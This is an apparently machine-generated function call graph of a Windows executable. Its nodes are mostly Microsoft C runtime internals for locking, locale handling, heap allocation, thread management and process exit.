aa6e1 20384->20446 20386 be62f ___scrt_is_nonwritable_in_current_image 20385->20386 20391 b80e1 EnterCriticalSection 20386->20391 20388 be63d 20392 be67f 20388->20392 20391->20388 20395 b80f8 LeaveCriticalSection 20392->20395 20394 b8358 20394->20186 20394->20352 20395->20394 20432 b801e 20396->20432 20398 b7ddb 20398->20378 20399->20359 20401 bc186 20400->20401 20402 bc180 20400->20402 20404 bcbd3 __Getctype 6 API calls 20401->20404 20425 bc18a SetLastError 20401->20425 20403 bcb94 __Getctype 6 API calls 20402->20403 20403->20401 20405 bc1a2 20404->20405 20406 bd2b4 __Getctype 14 API calls 20405->20406 20405->20425 20408 bc1b7 20406->20408 20411 bc1bf 20408->20411 20412 bc1d0 20408->20412 20409 bc21a 20409->20374 20410 bc21f 20413 b8353 CallUnexpected 37 API calls 20410->20413 20414 bcbd3 __Getctype 6 API calls 20411->20414 20415 bcbd3 __Getctype 6 API calls 20412->20415 20416 bc224 20413->20416 20417 bc1cd 20414->20417 20418 bc1dc 20415->20418 20422 bbed7 ___free_lconv_mon 14 API calls 20417->20422 20419 bc1e0 20418->20419 20420 bc1f7 20418->20420 20421 bcbd3 __Getctype 6 API calls 20419->20421 20423 bc47c __Getctype 14 API calls 20420->20423 20421->20417 20422->20425 20424 bc202 20423->20424 20426 bbed7 ___free_lconv_mon 14 API calls 20424->20426 20425->20409 20425->20410 20426->20425 20428 be555 20427->20428 20430 be51d 20427->20430 20445 b80f8 LeaveCriticalSection 20428->20445 20430->20372 20430->20376 20430->20378 20431->20367 20433 b8030 _Fputc 20432->20433 20436 b7f78 20433->20436 20435 b8048 _Fputc 20435->20398 20437 b7f88 20436->20437 20438 b7f8f 20436->20438 20439 b37f0 __strnicoll 16 API calls 20437->20439 20440 b7ff5 __strnicoll GetLastError SetLastError 20438->20440 20444 b7f9d 20438->20444 20439->20438 20441 b7fc4 20440->20441 20442 b7dfc __Getctype 11 API calls 20441->20442 20441->20444 20443 b7ff4 20442->20443 20444->20435 20445->20430 20447 aa6ea IsProcessorFeaturePresent 20446->20447 20448 aa6e9 20446->20448 20450 af447 20447->20450 20448->20383 20453 af52d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20450->20453 20452 af52a 20452->20383 20453->20452 20487 b297a 20454->20487 20457 bdd8e GetOEMCP 20459 bddb7 20457->20459 20458 bdda0 20458->20459 20460 bdda5 GetACP 20458->20460 20459->20147 20461 bbf11 20459->20461 20460->20459 20462 bbf4f 20461->20462 20466 bbf1f __Getctype 20461->20466 20464 b76e4 __dosmaperr 14 API calls 20462->20464 20463 bbf3a RtlAllocateHeap 20465 bbf4d 20463->20465 20463->20466 20464->20465 20465->20143 20465->20144 20466->20462 20466->20463 20467 b5877 codecvt 2 API calls 20466->20467 20467->20466 20469 bdd6d 41 API calls 20468->20469 20470 bdb88 20469->20470 20472 bdc8d 20470->20472 20473 bdbc5 IsValidCodePage 20470->20473 20478 bdbe0 __fread_nolock 20470->20478 20471 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20474 bdd6b 20471->20474 20472->20471 20473->20472 20475 bdbd7 20473->20475 20474->20149 20474->20153 20476 bdc00 GetCPInfo 20475->20476 20475->20478 20476->20472 20476->20478 20527 be0f7 20478->20527 20480 be2a8 ___scrt_is_nonwritable_in_current_image 20479->20480 20607 b80e1 EnterCriticalSection 20480->20607 20482 be2b2 20608 be036 20482->20608 20488 b2998 20487->20488 20489 b2991 20487->20489 20488->20489 20490 bc16a __Getctype 39 API calls 20488->20490 20489->20457 20489->20458 20491 b29b9 20490->20491 20495 bc74e 20491->20495 20496 bc761 20495->20496 20498 b29cf 20495->20498 20496->20498 20503 c08a5 20496->20503 20499 bc77b 20498->20499 20500 bc78e 20499->20500 20502 bc7a3 20499->20502 20500->20502 20524 bdb02 20500->20524 20502->20489 20504 c08b1 ___scrt_is_nonwritable_in_current_image 20503->20504 20505 bc16a __Getctype 39 API calls 20504->20505 20506 c08ba 20505->20506 20513 c0900 20506->20513 20516 b80e1 EnterCriticalSection 20506->20516 20508 c08d8 20517 c0926 20508->20517 20513->20498 20514 b8353 CallUnexpected 39 API calls 20515 c0925 20514->20515 20516->20508 20518 c0934 __Getctype 20517->20518 20519 c08e9 20517->20519 20518->20519 20520 c06da __Getctype 14 API calls 20518->20520 20521 c0905 20519->20521 20520->20519 20522 b80f8 std::_Lockit::~_Lockit LeaveCriticalSection 20521->20522 20523 c08fc 20522->20523 20523->20513 20523->20514 20525 bc16a __Getctype 39 API calls 20524->20525 20526 bdb07 20525->20526 20526->20502 20528 be11f GetCPInfo 20527->20528 20537 be1e8 20527->20537 20529 be137 20528->20529 20528->20537 20538 bd5a0 20529->20538 20531 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20533 be29a 20531->20533 20533->20472 20537->20531 20539 b297a __strnicoll 39 API calls 20538->20539 20540 bd5c0 20539->20540 20558 bbf5f 20540->20558 20542 bd67c 20543 bd674 20545 bd5ed 20545->20542 20545->20543 20547 bbf11 __fread_nolock 15 API calls 20545->20547 20549 bd612 __fread_nolock __alloca_probe_16 20545->20549 20547->20549 20549->20543 20550 bbf5f __fread_nolock MultiByteToWideChar 20549->20550 20565 bbf89 20558->20565 20566 bbf7b MultiByteToWideChar 20565->20566 20566->20545 20607->20482 20618 b8fc3 20608->20618 20610 be058 20619 b8fd4 20618->20619 20623 b8fd0 codecvt 20618->20623 20620 b8fdb 20619->20620 20625 b8fee __fread_nolock 20619->20625 20623->20610 20625->20623 20634 bbb68 20633->20634 20635 bbb5a 20633->20635 20636 b76e4 __dosmaperr 14 API calls 20634->20636 20635->20634 20640 bbb80 20635->20640 20637 bbb70 20636->20637 20638 b7dcf __strnicoll 29 API calls 20637->20638 20639 bbb7a 20638->20639 20639->20103 20640->20639 20641 b76e4 __dosmaperr 14 API calls 20640->20641 20641->20637 20646 b7bc3 20642->20646 20647 b7be0 20642->20647 20643 b7bda 20645 bbed7 ___free_lconv_mon 14 API calls 20643->20645 20644 bbed7 ___free_lconv_mon 14 API calls 20644->20646 20645->20647 20646->20643 20646->20644 20647->20105 20649 b7e08 20648->20649 20650 b7e30 CallUnexpected 8 API calls 20649->20650 20651 b7e1d GetCurrentProcess TerminateProcess 20650->20651 20651->20109 20653 c32a0 20652->20653 20654 c32b1 20653->20654 20656 c32c4 ___from_strstr_to_strchr 20653->20656 20655 b76e4 __dosmaperr 14 API calls 20654->20655 20664 c32b6 20655->20664 20657 c34db 20656->20657 20658 c32e4 20656->20658 20659 b76e4 __dosmaperr 14 API calls 20657->20659 20715 c3500 20658->20715 20661 c34e0 20659->20661 20663 bbed7 ___free_lconv_mon 14 API calls 20661->20663 20663->20664 20664->20052 20665 c3328 20701 c3314 20665->20701 20719 c351a 20665->20719 20666 c332a 20670 bd2b4 __Getctype 14 API calls 20666->20670 20666->20701 20668 c3306 20675 c330f 20668->20675 20676 c3323 20668->20676 20672 c3338 20670->20672 20671 bbed7 ___free_lconv_mon 14 API calls 20671->20664 20674 bbed7 ___free_lconv_mon 14 API calls 20672->20674 20673 c339d 20678 bbed7 ___free_lconv_mon 14 API calls 20673->20678 20679 c3343 20674->20679 20680 b76e4 __dosmaperr 14 API calls 20675->20680 20677 c3500 39 API calls 20676->20677 20677->20665 20686 c33a5 20678->20686 20679->20665 20684 bd2b4 __Getctype 14 API calls 20679->20684 20679->20701 20680->20701 20681 c33e8 20682 c28b5 std::ios_base::_Init 32 API calls 20681->20682 20681->20701 20683 c3416 20682->20683 20685 bbed7 ___free_lconv_mon 14 API calls 20683->20685 20688 c335f 20684->20688 20691 c33d2 20685->20691 20686->20691 20723 c28b5 20686->20723 20687 c34d0 20690 bbed7 ___free_lconv_mon 14 API calls 20687->20690 20689 bbed7 ___free_lconv_mon 14 API calls 20688->20689 20689->20665 20690->20664 20691->20687 20695 bd2b4 __Getctype 14 API calls 20691->20695 20691->20701 20693 c33c9 20694 bbed7 ___free_lconv_mon 14 API calls 20693->20694 20694->20691 20696 c3461 20695->20696 20697 c3469 20696->20697 20698 c3471 20696->20698 20699 bbed7 ___free_lconv_mon 14 API calls 20697->20699 20700 bbb4c ___std_exception_copy 29 API calls 20698->20700 20699->20701 20702 c347d 20700->20702 20701->20671 20703 c3484 20702->20703 20704 c34f5 20702->20704 20732 ca23c 20703->20732 20705 b7dfc __Getctype 11 API calls 20704->20705 20707 c34ff 20705->20707 20716 c350d 20715->20716 20717 c32ef 20715->20717 20747 c356f 20716->20747 20717->20665 20717->20666 20717->20668 20720 c3530 20719->20720 20722 c338d 20719->20722 20720->20722 20762 ca14b 20720->20762 20722->20673 20722->20681 20724 c28dd 20723->20724 20725 c28c2 20723->20725 20727 c28ec 20724->20727 20796 c9a54 20724->20796 20725->20724 20726 c28ce 20725->20726 20729 b76e4 __dosmaperr 14 API calls 20726->20729 20803 c62a0 20727->20803 20731 c28d3 __fread_nolock 20729->20731 20731->20693 20815 bd275 20732->20815 20737 ca2af 20739 ca2bb 20737->20739 20741 bbed7 ___free_lconv_mon 14 API calls 20737->20741 20738 bd275 39 API calls 20740 ca28c 20738->20740 20741->20739 20748 c357d 20747->20748 20749 c3582 20747->20749 20748->20717 20750 bd2b4 __Getctype 14 API calls 20749->20750 20756 c359f 20750->20756 20751 c360d 20752 b8353 CallUnexpected 39 API calls 20751->20752 20754 c3612 20752->20754 20753 bbed7 ___free_lconv_mon 14 API calls 20753->20748 20755 b7dfc __Getctype 11 API calls 20754->20755 20757 c361e 20755->20757 20756->20751 20756->20754 20758 bd2b4 __Getctype 14 API calls 20756->20758 20759 bbed7 ___free_lconv_mon 14 API calls 20756->20759 20760 bbb4c ___std_exception_copy 29 API calls 20756->20760 20761 c35fc 20756->20761 20758->20756 20759->20756 20760->20756 20761->20753 20763 ca15f 20762->20763 20764 ca159 20762->20764 20763->20720 20765 ca9bb 20764->20765 20766 ca973 20764->20766 20778 ca9d1 20765->20778 20768 ca979 20766->20768 20770 ca996 20766->20770 20769 b76e4 __dosmaperr 14 API calls 20768->20769 20772 ca97e 20769->20772 20773 b76e4 __dosmaperr 14 API calls 20770->20773 20777 ca9b4 20770->20777 20771 ca989 20771->20720 20774 b7dcf __strnicoll 29 API calls 20772->20774 20775 ca9a5 20773->20775 20774->20771 20776 b7dcf __strnicoll 29 API calls 20775->20776 20776->20771 20777->20720 20779 ca9fb 20778->20779 20780 ca9e1 20778->20780 20782 caa1a 20779->20782 20783 caa03 20779->20783 20781 b76e4 __dosmaperr 14 API calls 20780->20781 20784 ca9e6 20781->20784 20786 caa3d 20782->20786 20787 caa26 20782->20787 20785 b76e4 __dosmaperr 14 API calls 20783->20785 20788 b7dcf __strnicoll 29 API calls 20784->20788 20789 caa08 20785->20789 20791 b297a __strnicoll 39 API calls 20786->20791 20795 ca9f1 20786->20795 20790 b76e4 __dosmaperr 14 API calls 20787->20790 20788->20795 20792 b7dcf __strnicoll 29 API calls 20789->20792 20793 caa2b 20790->20793 20791->20795 20792->20795 20794 b7dcf __strnicoll 29 API calls 20793->20794 20794->20795 20795->20771 20797 c9a5f 20796->20797 20798 c9a74 HeapSize 20796->20798 20799 b76e4 __dosmaperr 14 API calls 20797->20799 20798->20727 20800 c9a64 20799->20800 20801 b7dcf __strnicoll 29 API calls 20800->20801 20802 c9a6f 20801->20802 20802->20727 20804 c62ad 20803->20804 20805 c62b8 20803->20805 20806 bbf11 __fread_nolock 15 API calls 20804->20806 20807 c62c0 20805->20807 20813 c62c9 __Getctype 20805->20813 20811 c62b5 20806->20811 20808 bbed7 ___free_lconv_mon 14 API calls 20807->20808 20808->20811 20809 c62ce 20812 b76e4 __dosmaperr 14 API calls 20809->20812 20810 c62f3 HeapReAlloc 20810->20811 20810->20813 20811->20731 20812->20811 20813->20809 20813->20810 20814 b5877 codecvt 2 API calls 20813->20814 20814->20813 20816 b297a __strnicoll 39 API calls 20815->20816 20817 bd287 20816->20817 20818 bd299 20817->20818 20823 bca46 20817->20823 20820 b2a74 20818->20820 20829 b2acc 20820->20829 20826 bd05b 20823->20826 20827 bcfd6 __Getctype 5 API calls 20826->20827 20828 bca4e 20827->20828 20828->20818 20830 b2ada 20829->20830 20831 b2af4 20829->20831 20847 b2a5a 20830->20847 20833 b2afb 20831->20833 20834 b2b1a 20831->20834 20839 b2a8c 20833->20839 20851 b2a1b 20833->20851 20835 bbf5f __fread_nolock MultiByteToWideChar 20834->20835 20836 b2b29 20835->20836 20838 b2b30 GetLastError 20836->20838 20841 b2b56 20836->20841 20843 b2a1b 15 API calls 20836->20843 20839->20737 20839->20738 20841->20839 20843->20841 20848 b2a6d 20847->20848 20849 b2a65 20847->20849 20848->20839 20850 bbed7 ___free_lconv_mon 14 API calls 20849->20850 20850->20848 20852 b2a5a 14 API calls 20851->20852 20853 b2a29 20852->20853 20868 aa668 ___std_exception_copy 20867->20868 20869 a24f3 20868->20869 20870 b5877 codecvt 2 API calls 20868->20870 20871 aa684 20868->20871 20878 b5349 20869->20878 20870->20868 20872 af338 codecvt 20871->20872 20873 aa68e Concurrency::cancel_current_task 20871->20873 20874 b060c Concurrency::cancel_current_task RaiseException 20872->20874 20905 b060c 20873->20905 20875 af354 20874->20875 20877 ab4ce 20879 b536a 20878->20879 20880 b5356 20878->20880 20908 b53da 20879->20908 20882 b76e4 __dosmaperr 14 API calls 20880->20882 20883 b535b 20882->20883 20885 b7dcf __strnicoll 29 API calls 20883->20885 20887 b5366 20885->20887 20886 b537f CreateThread 20888 b539e GetLastError 20886->20888 20889 b53aa 20886->20889 20925 b5470 20886->20925 20887->19900 20890 b770a __dosmaperr 14 API calls 20888->20890 20917 b542a 20889->20917 20890->20889 20894 a253a 20893->20894 20895 af134 20893->20895 20894->19912 20894->19913 20896 af13b GetExitCodeThread 20895->20896 20897 af151 CloseHandle 20895->20897 20896->20894 20898 af14c 20896->20898 20897->20894 20898->20897 20900 ab32d std::_Throw_Cpp_error 20899->20900 20964 ab352 20900->20964 20906 b0654 RaiseException 20905->20906 20907 b0626 20905->20907 20906->20877 20907->20906 20909 bd2b4 __Getctype 14 API calls 20908->20909 20910 b53eb 20909->20910 20911 bbed7 ___free_lconv_mon 14 API calls 20910->20911 20912 b53f8 20911->20912 20913 b53ff GetModuleHandleExW 20912->20913 20914 b541c 20912->20914 20913->20914 20915 b542a 16 API calls 20914->20915 20916 b5376 20915->20916 20916->20886 20916->20889 20918 b53b5 20917->20918 20919 b5436 20917->20919 20918->19900 20920 b543c CloseHandle 20919->20920 20921 b5445 20919->20921 20920->20921 20922 b544b FreeLibrary 20921->20922 20923 b5454 20921->20923 20922->20923 20924 bbed7 ___free_lconv_mon 14 API calls 20923->20924 20924->20918 20926 b547c ___scrt_is_nonwritable_in_current_image 20925->20926 20927 b5483 GetLastError ExitThread 20926->20927 20928 b5490 20926->20928 20929 bc16a __Getctype 39 API calls 20928->20929 20930 b5495 20929->20930 20939 bf767 20930->20939 20933 b54ac 20943 b53cc 20933->20943 20940 b54a0 20939->20940 20941 bf777 CallUnexpected 20939->20941 20940->20933 20946 bcde0 20940->20946 20941->20940 20949 bce89 20941->20949 20952 b54ee 20943->20952 20947 bcfd6 __Getctype 5 API calls 20946->20947 20948 bcdfc 20947->20948 20948->20933 20950 bcfd6 __Getctype 5 API calls 20949->20950 20951 bcea5 20950->20951 20951->20940 20953 bc2bb __dosmaperr 14 API calls 20952->20953 20955 b54f9 20953->20955 20954 b553b ExitThread 20955->20954 20956 b5512 20955->20956 20961 bce1b 20955->20961 20958 b5525 20956->20958 20959 b551e CloseHandle 20956->20959 20958->20954 20960 b5531 FreeLibraryAndExitThread 20958->20960 20959->20958 20960->20954 20962 bcfd6 __Getctype 5 API calls 20961->20962 20963 bce34 20962->20963 20963->20956 20965 ab35e __EH_prolog3_GS 20964->20965 20972 ab281 20965->20972 20969 ab387 std::_Throw_Cpp_error 20993 afb97 20969->20993 20973 ab29e 20972->20973 20973->20973 20996 ab39f 20973->20996 20975 ab2b2 20976 a3430 20975->20976 20977 a345e 20976->20977 20978 a358b 20977->20978 20979 a3468 20977->20979 20980 a2600 std::_Throw_Cpp_error 30 API calls 20978->20980 20981 a34bd 20979->20981 20982 a34a4 20979->20982 20987 a3470 codecvt 20979->20987 20991 a3530 20980->20991 20983 aa663 codecvt 3 API calls 20981->20983 20986 aa663 codecvt 3 API calls 20982->20986 20983->20987 20986->20987 21040 a35a0 20987->21040 20989 a34f9 20990 b0bf6 ___std_exception_copy 29 API calls 20989->20990 20990->20991 20992 a355c std::ios_base::_Ios_base_dtor 20991->20992 21051 b7ddf 20991->21051 20992->20969 20994 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20993->20994 20995 afba1 20994->20995 20995->20995 20997 ab417 20996->20997 21000 ab3b6 std::_Throw_Cpp_error 20996->21000 21011 a2600 20997->21011 21001 ab3bd std::_Throw_Cpp_error codecvt 21000->21001 21003 ab449 21000->21003 21001->20975 21004 ab453 21003->21004 21005 ab455 21003->21005 21004->21001 21006 ab45d 21005->21006 21007 ab464 21005->21007 21014 ab46c 21006->21014 21008 aa663 codecvt 3 API calls 21007->21008 21010 ab462 21008->21010 21010->21001 21029 ab4cf 21011->21029 21015 ab47d 21014->21015 21016 a2610 21014->21016 21017 aa663 codecvt 3 API calls 21015->21017 21018 b060c Concurrency::cancel_current_task RaiseException 21016->21018 21020 ab483 21017->21020 21019 a2642 21018->21019 21023 b0bf6 21019->21023 21020->21010 21024 a2678 21023->21024 21026 b0c03 ___std_exception_copy 21023->21026 21024->21010 21025 b0c30 21028 b92d7 ___std_exception_copy 14 API calls 21025->21028 21026->21024 21026->21025 21027 bbb4c ___std_exception_copy 29 API calls 21026->21027 21027->21025 21028->21024 21034 ab59a 21029->21034 21032 b060c Concurrency::cancel_current_task RaiseException 21033 ab4ee 21032->21033 21037 ab14d 21034->21037 21038 b0bf6 ___std_exception_copy 29 API calls 21037->21038 21039 ab179 21038->21039 21039->21032 21041 a35dd 21040->21041 21043 a361a 21040->21043 21041->21043 21056 a3790 21041->21056 21044 a3790 std::_Throw_Cpp_error 30 API calls 21043->21044 21045 a36b0 codecvt 21043->21045 21044->21045 21046 a36fc std::ios_base::_Ios_base_dtor 21045->21046 21047 b7ddf std::_Throw_Cpp_error 29 API calls 21045->21047 21046->20989 21048 a374a 21047->21048 21070 a1460 21048->21070 21050 a375f 21050->20989 21052 b801e __strnicoll 29 API calls 21051->21052 21053 b7dee 21052->21053 21054 b7dfc __Getctype 11 API calls 21053->21054 21055 b7dfb 21054->21055 21057 a38d5 21056->21057 21063 a37ad 21056->21063 21058 a2600 std::_Throw_Cpp_error 30 API calls 21057->21058 21062 a37dc codecvt 21058->21062 21059 a37d1 21060 aa663 codecvt 3 API calls 21059->21060 21060->21062 21061 b7ddf std::_Throw_Cpp_error 29 API calls 21065 a38df 21061->21065 21062->21061 21068 a3841 std::ios_base::_Ios_base_dtor codecvt 21062->21068 21063->21059 21063->21062 21064 a38c1 21063->21064 21066 a38bc 21063->21066 21067 aa663 codecvt 3 API calls 21064->21067 21074 a2610 21066->21074 21067->21062 21068->21043 21071 a146c 21070->21071 21072 a1486 std::ios_base::_Ios_base_dtor 21070->21072 21071->21072 21073 b7ddf std::_Throw_Cpp_error 29 API calls 21071->21073 21072->21050 21073->21071 21075 b060c Concurrency::cancel_current_task RaiseException 21074->21075 21076 a2642 21075->21076 21077 b0bf6 ___std_exception_copy 29 API calls 21076->21077 21078 a2678 21077->21078 21078->21064 21080 b56cf 21079->21080 21081 b56bd 21079->21081 21091 b582a 21080->21091 21082 af896 CallUnexpected GetModuleHandleW 21081->21082 21085 b56c2 21082->21085 21085->21080 21106 b55c4 GetModuleHandleExW 21085->21106 21086 b048b 21086->19940 21092 b5836 ___scrt_is_nonwritable_in_current_image 21091->21092 21112 b80e1 EnterCriticalSection 21092->21112 21094 b5840 21113 b5727 21094->21113 21096 b584d 21117 b586b 21096->21117 21099 b565f 21142 b5646 21099->21142 21101 b5669 21102 b567d 21101->21102 21103 b566d GetCurrentProcess TerminateProcess 21101->21103 21104 b55c4 CallUnexpected 3 API calls 21102->21104 21103->21102 21105 b5685 ExitProcess 21104->21105 21107 b5603 GetProcAddress 21106->21107 21108 b5624 21106->21108 21107->21108 21111 b5617 21107->21111 21109 b562a FreeLibrary 21108->21109 21110 b5633 21108->21110 21109->21110 21110->21080 21111->21108 21112->21094 21115 b5733 ___scrt_is_nonwritable_in_current_image CallUnexpected 21113->21115 21114 b5797 CallUnexpected 21114->21096 21115->21114 21120 b73fe 21115->21120 21141 b80f8 LeaveCriticalSection 21117->21141 21119 b5706 21119->21086 21119->21099 21121 b740a __EH_prolog3 21120->21121 21124 b7689 21121->21124 21123 b7431 codecvt 21123->21114 21125 b7695 ___scrt_is_nonwritable_in_current_image 21124->21125 21132 b80e1 EnterCriticalSection 21125->21132 21127 b76a3 21133 b7554 21127->21133 21132->21127 21134 b7573 21133->21134 21135 b756b 21133->21135 21134->21135 21136 bbed7 ___free_lconv_mon 14 API calls 21134->21136 21137 b76d8 21135->21137 21136->21135 21140 b80f8 LeaveCriticalSection 21137->21140 21139 b76c1 21139->21123 21140->21139 21141->21119 21145 bf740 21142->21145 21144 b564b CallUnexpected 21144->21101 21146 bf74f CallUnexpected 21145->21146 21147 bf75c 21146->21147 21149 bce49 21146->21149 21147->21144 21150 bcfd6 __Getctype 5 API calls 21149->21150 21151 bce65 21150->21151 21151->21147 21153 b325f ___scrt_uninitialize_crt 21152->21153 21154 b324d 21152->21154 21153->19934 21155 b325b 21154->21155 21157 b854a 21154->21157 21155->19934 21160 b8675 21157->21160 21163 b874e 21160->21163 21164 b875a ___scrt_is_nonwritable_in_current_image 21163->21164 21171 b80e1 EnterCriticalSection 21164->21171 21166 b87d0 21180 b87ee 21166->21180 21169 b8764 ___scrt_uninitialize_crt 21169->21166 21172 b86c2 21169->21172 21171->21169 21173 b86ce ___scrt_is_nonwritable_in_current_image 21172->21173 21183 b3315 EnterCriticalSection 21173->21183 21175 b86d8 ___scrt_uninitialize_crt 21296 b80f8 LeaveCriticalSection 21180->21296 21182 b8551 21182->21155 21183->21175 21296->21182 21297 ab060 21320 aafc4 GetModuleHandleExW 21297->21320 21300 ab0a6 21302 aafc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21300->21302 21304 ab0ac 21302->21304 21308 ab0cd 21304->21308 21337 aafa7 GetModuleHandleExW 21304->21337 21307 ab0bd 21307->21308 21309 ab0c3 FreeLibraryWhenCallbackReturns 21307->21309 21322 a7770 21308->21322 21309->21308 21310 ab0dd 21311 aafc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21310->21311 21312 ab0e3 21311->21312 21313 ab111 21312->21313 21314 aaefa 37 API calls 21312->21314 21315 ab0ef 21314->21315 21316 aefd2 ReleaseSRWLockExclusive 21315->21316 21317 ab102 21316->21317 21317->21313 21338 ae95d WakeAllConditionVariable 21317->21338 21321 aafda 21320->21321 21321->21300 21328 aaefa 21321->21328 21323 a77af 21322->21323 21339 a8aa0 21323->21339 21324 a77b9 21344 aaf64 21324->21344 21326 a77cb 21326->21310 21329 aefc1 12 API calls 21328->21329 21331 aaf03 21329->21331 21330 ab317 std::_Throw_Cpp_error 30 API calls 21333 aaf20 21330->21333 21331->21330 21332 aaf17 21331->21332 21334 aefd2 21332->21334 21335 aefdf ReleaseSRWLockExclusive 21334->21335 21336 aefed 21334->21336 21335->21336 21336->21300 21337->21307 21338->21313 21340 a8add 21339->21340 21341 a8ae8 21340->21341 21347 a90e0 21340->21347 21364 a90f0 21340->21364 21341->21324 21345 aaf7b 21344->21345 21346 aaf70 CloseThreadpoolWork 21344->21346 21345->21326 21346->21345 21348 a90ea 21347->21348 21380 aefc1 21348->21380 21351 a9136 21353 a91ce 21351->21353 21354 a9143 21351->21354 21352 a91c7 21355 ab317 std::_Throw_Cpp_error 30 API calls 21352->21355 21358 ab317 std::_Throw_Cpp_error 30 API calls 21353->21358 21356 a914b 21354->21356 21357 a9174 21354->21357 21355->21353 21359 aefd2 ReleaseSRWLockExclusive 21356->21359 21361 aefd2 ReleaseSRWLockExclusive 21357->21361 21360 a9151 std::_Throw_Cpp_error 21358->21360 21359->21360 21360->21341 21362 a9181 21361->21362 21383 a92f0 21362->21383 21365 aefc1 12 API calls 21364->21365 21366 a912b 21365->21366 21367 a9136 21366->21367 21368 a91c7 21366->21368 21369 a91ce 21367->21369 21370 a9143 21367->21370 21371 ab317 std::_Throw_Cpp_error 30 API calls 21368->21371 21374 ab317 std::_Throw_Cpp_error 30 API calls 21369->21374 21372 a914b 21370->21372 21373 a9174 21370->21373 21371->21369 21375 aefd2 ReleaseSRWLockExclusive 21372->21375 21377 aefd2 ReleaseSRWLockExclusive 21373->21377 21376 a9151 std::_Throw_Cpp_error 21374->21376 21375->21376 21376->21341 21378 a9181 21377->21378 21379 a92f0 66 API calls 21378->21379 21379->21376 21390 aeff1 GetCurrentThreadId 21380->21390 21416 a9620 21383->21416 21387 a939f 21425 a9400 21387->21425 21391 af03a 21390->21391 21392 af01b 21390->21392 21394 af05a 21391->21394 21395 af043 21391->21395 21393 af020 AcquireSRWLockExclusive 21392->21393 21401 af030 21392->21401 21393->21401 21397 af0b9 21394->21397 21403 af072 21394->21403 21396 af04e AcquireSRWLockExclusive 21395->21396 21395->21401 21396->21401 21398 af0c0 TryAcquireSRWLockExclusive 21397->21398 21397->21401 21398->21401 21399 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21400 a912b 21399->21400 21400->21351 21400->21352 21401->21399 21403->21401 21404 af0a9 TryAcquireSRWLockExclusive 21403->21404 21405 afdcd 21403->21405 21404->21401 21404->21403 21408 afda6 21405->21408 21407 afdd8 __aulldiv __aullrem 21407->21403 21411 b00b4 21408->21411 21412 b00f0 GetSystemTimeAsFileTime 21411->21412 21413 b00e4 GetSystemTimePreciseAsFileTime 21411->21413 21414 afdb4 21412->21414 21413->21414 21414->21407 21418 a9667 21416->21418 21417 aa663 codecvt 3 API calls 21419 a935f 21417->21419 21418->21417 21420 a94f0 21419->21420 21421 a9536 std::_Throw_Cpp_error 21420->21421 21424 a9540 std::_Throw_Cpp_error 21421->21424 21450 ab57d 21421->21450 21424->21387 21426 aefc1 12 API calls 21425->21426 21427 a9418 21426->21427 21428 a94c6 21427->21428 21429 a94cd 21427->21429 21431 a9438 21427->21431 21432 a9443 21427->21432 21430 ab317 std::_Throw_Cpp_error 30 API calls 21428->21430 21433 ab317 std::_Throw_Cpp_error 30 API calls 21429->21433 21430->21429 21434 aefd2 ReleaseSRWLockExclusive 21431->21434 21435 aefd2 ReleaseSRWLockExclusive 21432->21435 21436 a94db 21433->21436 21437 a93ae 21434->21437 21438 a9450 21435->21438 21439 ab317 std::_Throw_Cpp_error 30 API calls 21436->21439 21437->21360 21441 aefc1 12 API calls 21438->21441 21440 a94ec 21439->21440 21442 a945c 21441->21442 21442->21428 21443 a9463 21442->21443 21443->21436 21444 a946f 21443->21444 21454 ae95d WakeAllConditionVariable 21444->21454 21446 a948b 21447 aefd2 ReleaseSRWLockExclusive 21446->21447 21449 a9494 21447->21449 21449->21437 21455 a7a10 21449->21455 21451 ab58b Concurrency::cancel_current_task 21450->21451 21452 b060c Concurrency::cancel_current_task RaiseException 21451->21452 21453 ab599 21452->21453 21454->21446 21456 a7a4f 21455->21456 21458 a7a75 21456->21458 21459 a7b60 21456->21459 21458->21449 21460 a7ba7 21459->21460 21461 a7bb0 21460->21461 21462 a7bc5 21460->21462 21464 aa663 codecvt 3 API calls 21461->21464 21468 a8970 21462->21468 21465 a7c00 21464->21465 21481 a73e0 21465->21481 21467 a7bd9 21467->21458 21469 a89a9 21468->21469 21474 a89b0 21468->21474 21470 aa663 codecvt 3 API calls 21469->21470 21469->21474 21471 a8a05 21470->21471 21474->21467 21482 a7419 21481->21482 21485 a744d 21481->21485 21485->21467 21529 a15d0 21540 a1e40 21529->21540 21531 a15db 21534 a16dd 21531->21534 21546 a4320 21531->21546 21559 a1750 21531->21559 21573 a1d10 21531->21573 21532 a1702 std::ios_base::_Ios_base_dtor 21534->21532 21535 b7ddf std::_Throw_Cpp_error 29 API calls 21534->21535 21537 a1725 21535->21537 21581 a1ea0 21537->21581 21541 a1e63 _Fputc 21540->21541 21586 b3558 21541->21586 21543 a1e7c 21544 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21543->21544 21545 a1e8c 21544->21545 21545->21531 21547 a444e 21546->21547 21548 a4364 21546->21548 21549 a2610 std::_Throw_Cpp_error 30 API calls 21547->21549 21550 a437e 21548->21550 21551 a43a5 21548->21551 21557 a4393 codecvt 21548->21557 21549->21557 21550->21547 21554 a438a 21550->21554 21552 aa663 codecvt 3 API calls 21551->21552 21552->21557 21553 b7ddf std::_Throw_Cpp_error 29 API calls 21555 a4458 21553->21555 21556 aa663 codecvt 3 API calls 21554->21556 21556->21557 21557->21553 21558 a4424 std::ios_base::_Ios_base_dtor 21557->21558 21558->21531 21560 a1788 _strlen 21559->21560 21563 a1833 21560->21563 21570 a180d 21560->21570 22079 a2c50 21560->22079 21563->21570 22053 a4460 21563->22053 21564 a1b9f 21564->21531 21565 a1b8e 21565->21564 22089 a38e0 21565->22089 21569 b060c Concurrency::cancel_current_task RaiseException 21569->21570 21570->21565 21570->21569 22097 a2f00 21570->22097 22105 a32c0 21570->22105 21571 a188d 21571->21570 22070 adef0 21571->22070 21574 a1d5c 21573->21574 21575 a4460 67 API calls 21574->21575 21576 a1d70 21575->21576 22634 a4b10 21576->22634 21579 a2c50 39 API calls 21580 a1deb 21579->21580 21580->21531 21582 a1ea9 21581->21582 